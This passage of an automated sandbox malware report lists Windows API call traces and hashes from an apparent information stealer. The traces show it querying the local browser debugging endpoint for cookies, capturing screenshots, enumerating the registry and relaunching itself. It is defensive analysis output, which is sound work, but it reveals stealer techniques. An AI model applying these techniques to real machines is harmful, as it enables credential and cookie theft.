                          • String ID: .txt$/devtools$cookies$localhost$ws://localhost:9229
                          • API String ID: 1201316467-3542011879
                          • Opcode ID: c29b45eaeaa5001dfc167347bd2d76c3cf471d88be1367733681d274174d22c9
                          • Instruction ID: 36159ba2a853b72dc4bd382d28350bfacc78d4872effb7a16da26502cb733ccf
                          • Opcode Fuzzy Hash: c29b45eaeaa5001dfc167347bd2d76c3cf471d88be1367733681d274174d22c9
                          • Instruction Fuzzy Hash: 2BE11A71E10218DBDF54DFA8D884ADEBBB5FF58310F10846AE609A7342DB389E46CB51
                          APIs
                          • memset.MSVCRT ref: 007ED9A1
                          • memset.MSVCRT ref: 007ED9B3
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007ED9DB
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EDA0E
                          • lstrcat.KERNEL32(?,00000000), ref: 007EDA1C
                          • lstrcat.KERNEL32(?,0125E2B0), ref: 007EDA36
                          • lstrcat.KERNEL32(?,?), ref: 007EDA4A
                          • lstrcat.KERNEL32(?,0125D6A0), ref: 007EDA5E
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EDA8E
                          • GetFileAttributesA.KERNEL32(00000000), ref: 007EDA95
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EDAFE
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcat$lstrcpy$memset$AttributesFileFolderPath
                          • String ID:
                          • API String ID: 2367105040-0
                          • Opcode ID: ee1da681a5e7df1b754f78611655a4c04c7cf67fe4bd2389e6a82db77f3c81bb
                          • Instruction ID: ef82cf19c185fb66be38b3f3f877553c1360426a5992fcf07ad476a708f51ee5
                          • Opcode Fuzzy Hash: ee1da681a5e7df1b754f78611655a4c04c7cf67fe4bd2389e6a82db77f3c81bb
                          • Instruction Fuzzy Hash: 0DB1C2B19002599FDB20EFB4DC889EE77B9EF8C300F148565E946E7251DA389E46CB90
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DB330
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB37E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB3A9
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DB3B1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB3D9
                          • lstrlen.KERNEL32(00804C50), ref: 007DB450
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB474
                          • lstrcat.KERNEL32(00000000,00804C50), ref: 007DB480
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB4A9
                          • lstrlen.KERNEL32(00000000), ref: 007DB52D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB557
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DB55F
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB587
                          • lstrlen.KERNEL32(00804AD4), ref: 007DB5FE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB622
                          • lstrcat.KERNEL32(00000000,00804AD4), ref: 007DB62E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB65E
                          • lstrlen.KERNEL32(?), ref: 007DB767
                          • lstrlen.KERNEL32(?), ref: 007DB776
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DB79E
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$lstrcat
                          • String ID:
                          • API String ID: 2500673778-0
                          • Opcode ID: 5420db64d89e0aa666d2a5fd67ac8d75b154684300e0104fda1286bd11e10561
                          • Instruction ID: ebfa24e2b08cc912beb39c66bd8459f812f85c39eb68176eaf25802c24d1eb92
                          • Opcode Fuzzy Hash: 5420db64d89e0aa666d2a5fd67ac8d75b154684300e0104fda1286bd11e10561
                          • Instruction Fuzzy Hash: 09025F70A01206CFCB25DF65D998B6AB7F5EF44314F1A816AE8099B362D739DC43CB90
                          APIs
                            • Part of subcall function 007F71E0: lstrcpy.KERNEL32(00000000,ERROR), ref: 007F71FE
                          • RegOpenKeyExA.ADVAPI32(?,0125B6D8,00000000,00020019,?), ref: 007F37BD
                          • RegEnumKeyExA.ADVAPI32(?,?,?,?,00000000,00000000,00000000,00000000), ref: 007F37F7
                          • wsprintfA.USER32 ref: 007F3822
                          • RegOpenKeyExA.ADVAPI32(?,?,00000000,00020019,?), ref: 007F3840
                          • RegCloseKey.ADVAPI32(?), ref: 007F384E
                          • RegCloseKey.ADVAPI32(?), ref: 007F3858
                          • RegQueryValueExA.ADVAPI32(?,0125E208,00000000,000F003F,?,?), ref: 007F38A1
                          • lstrlen.KERNEL32(?), ref: 007F38B6
                          • RegQueryValueExA.ADVAPI32(?,0125E040,00000000,000F003F,?,00000400), ref: 007F3927
                          • RegCloseKey.ADVAPI32(?), ref: 007F3972
                          • RegCloseKey.ADVAPI32(?), ref: 007F3989
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Close$OpenQueryValue$Enumlstrcpylstrlenwsprintf
                          • String ID: - $%s\%s$?
                          • API String ID: 13140697-3278919252
                          • Opcode ID: 3b8ec6e35e9e962fb16b3c88aac9aa22e72756664f9e8bb2b7bf99e51e9e8fd3
                          • Instruction ID: 563ce0e01fba37272c66a161e111f5b74713f73d7a8a4f9499d67f87d459f2f6
                          • Opcode Fuzzy Hash: 3b8ec6e35e9e962fb16b3c88aac9aa22e72756664f9e8bb2b7bf99e51e9e8fd3
                          • Instruction Fuzzy Hash: 7F917CB290020DDFCB10DFA4DD849AEB7B9FB48310F148569E609AB351D779AE46CB90
                          APIs
                          • InternetOpenA.WININET(007FCFEC,00000001,00000000,00000000,00000000), ref: 007D90DF
                          • InternetOpenUrlA.WININET(00000000,http://localhost:9229/json,00000000,00000000,80000000,00000000), ref: 007D90FC
                          • InternetCloseHandle.WININET(00000000), ref: 007D9109
                          • InternetReadFile.WININET(?,?,?,00000000), ref: 007D9166
                          • InternetReadFile.WININET(00000000,?,00001000,?), ref: 007D9197
                          • InternetCloseHandle.WININET(00000000), ref: 007D91A2
                          • InternetCloseHandle.WININET(00000000), ref: 007D91A9
                          • strlen.MSVCRT ref: 007D91BA
                          • strlen.MSVCRT ref: 007D91ED
                          • strlen.MSVCRT ref: 007D922E
                          • strlen.MSVCRT ref: 007D924C
                            • Part of subcall function 007D8980: std::_Xinvalid_argument.LIBCPMT ref: 007D8996
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$strlen$CloseHandle$FileOpenRead$Xinvalid_argumentstd::_
                          • String ID: "webSocketDebuggerUrl":$"ws://$http://localhost:9229/json
                          • API String ID: 1530259920-2144369209
                          • Opcode ID: a3883693f373c43ef943b957fc243e4a7951df95704c3c4ff90a061b6fe23f32
                          • Instruction ID: dbe4201d1b070da3ca3814b9b2d3ca1cf42018d904ef5d5ba8957ee5f1c32213
                          • Opcode Fuzzy Hash: a3883693f373c43ef943b957fc243e4a7951df95704c3c4ff90a061b6fe23f32
                          • Instruction Fuzzy Hash: 5551B571640209ABD710DBE8DC45BEEF7F9EF48720F14006AF604E3381DBB9AA458765
                          APIs
                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,?,?), ref: 007F16A1
                          • lstrcpy.KERNEL32(00000000,0124B8B0), ref: 007F16CC
                          • lstrlen.KERNEL32(?), ref: 007F16D9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F16F6
                          • lstrcat.KERNEL32(00000000,?), ref: 007F1704
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F172A
                          • lstrlen.KERNEL32(0125A350), ref: 007F173F
                          • lstrcpy.KERNEL32(00000000,?), ref: 007F1762
                          • lstrcat.KERNEL32(00000000,0125A350), ref: 007F176A
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007F1792
                          • ShellExecuteEx.SHELL32(?), ref: 007F17CD
                          • ExitProcess.KERNEL32 ref: 007F1803
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcatlstrlen$ExecuteExitFileModuleNameProcessShell
                          • String ID: <
                          • API String ID: 3579039295-4251816714
                          • Opcode ID: 10de5bf8c071e1d07c1f0a1d2050b25d8ab325c059e9d8a8ec9dfc15ee327064
                          • Instruction ID: 2e485cbbf00245001186d645b9e3311e7936136f140e99b757f1572ea769a12e
                          • Opcode Fuzzy Hash: 10de5bf8c071e1d07c1f0a1d2050b25d8ab325c059e9d8a8ec9dfc15ee327064
                          • Instruction Fuzzy Hash: 50514271A1121EDBDB11EFA4DD84AAEB7F9AF58300F444125E905E3352DB38AE078B94
                          APIs
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EEFE4
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EF012
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 007EF026
                          • lstrlen.KERNEL32(00000000), ref: 007EF035
                          • LocalAlloc.KERNEL32(00000040,00000001), ref: 007EF053
                          • StrStrA.SHLWAPI(00000000,?), ref: 007EF081
                          • lstrlen.KERNEL32(?), ref: 007EF094
                          • lstrlen.KERNEL32(00000000), ref: 007EF0B2
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 007EF0FF
                          • lstrcpy.KERNEL32(00000000,ERROR), ref: 007EF13F
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen$AllocLocal
                          • String ID: ERROR
                          • API String ID: 1803462166-2861137601
                          • Opcode ID: e39e9134c6417223f8ea6554cf26ac7049584d054ab20c99df11f56308561f64
                          • Instruction ID: 260209f5f3ffeee652febe0634cff286bcc8c54a0a8d1ae6aa86cd79bc98cc0c
                          • Opcode Fuzzy Hash: e39e9134c6417223f8ea6554cf26ac7049584d054ab20c99df11f56308561f64
                          • Instruction Fuzzy Hash: 1D518D71A11259DBCB21EF75DC49A6A77B4EF98310F049169EC49EB353DA38EC038B90
                          APIs
                          • GetEnvironmentVariableA.KERNEL32(012590B8,00A09BD8,0000FFFF), ref: 007DA026
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007DA053
                          • lstrlen.KERNEL32(00A09BD8), ref: 007DA060
                          • lstrcpy.KERNEL32(00000000,00A09BD8), ref: 007DA08A
                          • lstrlen.KERNEL32(00804C4C), ref: 007DA095
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DA0B2
                          • lstrcat.KERNEL32(00000000,00804C4C), ref: 007DA0BE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DA0E4
                          • lstrcat.KERNEL32(00000000,00000000), ref: 007DA0EF
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007DA114
                          • SetEnvironmentVariableA.KERNEL32(012590B8,00000000), ref: 007DA12F
                          • LoadLibraryA.KERNEL32(0125DE90), ref: 007DA143
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$EnvironmentVariablelstrcatlstrlen$LibraryLoad
                          • String ID:
                          • API String ID: 2929475105-0
                          • Opcode ID: 6e7896efcc4e924684c296b0223d7c4af8c02dedd0946845662ae282daa8d36a
                          • Instruction ID: da83e8501dbbdddf076d57d704f7ad1f44ede508bf119ceba71b711450cc5135
                          • Opcode Fuzzy Hash: 6e7896efcc4e924684c296b0223d7c4af8c02dedd0946845662ae282daa8d36a
                          • Instruction Fuzzy Hash: 2791B131600A18AFD721DFA4DC88A6637B6FB94704F44412AE94587362EFBDDC43CB92
                          APIs
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EC8A2
                          • lstrcpy.KERNEL32(00000000,007FCFEC), ref: 007EC8D1
                          • lstrlen.KERNEL32(00000000), ref: 007EC8FC
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 007EC932
                          • StrCmpCA.SHLWAPI(00000000,00804C3C), ref: 007EC943
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrlen
                          • String ID:
                          • API String ID: 367037083-0
                          • Opcode ID: f4e58455b7067d020805d3087ad706ebc95aab18d8b5667d2d6dc99188e26670
                          • Instruction ID: 77a1d3a6bb1741298f9252d508b03a82e87590f3ca3d07e134d126d2bce03331
                          • Opcode Fuzzy Hash: f4e58455b7067d020805d3087ad706ebc95aab18d8b5667d2d6dc99188e26670
                          • Instruction Fuzzy Hash: EE61B475E122599BDB12EFB6CD49AAE7BF8EF19300F048165E841E7342D73C99038B90
                          APIs
                          • CreateStreamOnHGlobal.COMBASE(00000000,00000001,007F0CF0), ref: 007F4276
                          • GetDesktopWindow.USER32 ref: 007F4280
                          • GetWindowRect.USER32(00000000,?), ref: 007F428D
                          • SelectObject.GDI32(00000000,00000000), ref: 007F42BF
                          • GetHGlobalFromStream.COMBASE(007F0CF0,?), ref: 007F4336
                          • GlobalLock.KERNEL32(?), ref: 007F4340
                          • GlobalSize.KERNEL32(?), ref: 007F434D
                          Memory Dump Source
                          • Source File: 00000000.00000002.1769514493.00000000007D1000.00000040.00000001.01000000.00000003.sdmp, Offset: 007D0000, based on PE: true
                          • Associated: 00000000.00000002.1769495593.00000000007D0000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000807000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000085E000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000866000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.000000000087F000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769514493.0000000000A08000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769667983.0000000000A1A000.00000004.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000A1C000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000BA2000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000C78000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CA1000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CAA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769682179.0000000000CB7000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1769922774.0000000000CB8000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.1770028581.0000000000E4E000.00000040.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_7d0000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Global$StreamWindow$CreateDesktopFromLockObjectRectSelectSize
                          • String ID:
                          • API String ID: 1264946473-0
                          • Opcode ID: 69f32d39ebd93029db71f4eccf88a93a3dcbc414cbf3ad8f8f1634b58ef9896a
                          • Instruction ID: e69f39944708731c2b9034465aacba84a35ded5d3a3a5d405fd601704fd9169c
                          • Opcode Fuzzy Hash: 69f32d39ebd93029db71f4eccf88a93a3dcbc414cbf3ad8f8f1634b58ef9896a
                          • Instruction Fuzzy Hash: 1C510D75A1021DAFDB10DFE4DD89AAEB7B9EF88300F104519F905A3251DB78AD078BA0
                          APIs
                          • lstrcat.KERNEL32(?,0125E2B0), ref: 007EE00D
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 007EE037
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE06F
                          • lstrcat.KERNEL32(?,00000000), ref: 007EE07D
                          • lstrcat.KERNEL32(?,?), ref: 007EE098
                          • lstrcat.KERNEL32(?,?), ref: 007EE0AC
                          • lstrcat.KERNEL32(?,0124B9C8), ref: 007EE0C0
                          • lstrcat.KERNEL32(?,?), ref: 007EE0D4
                          • lstrcat.KERNEL32(?,0125DD90), ref: 007EE0E7
                          • lstrcpy.KERNEL32(00000000,?), ref: 007EE11F
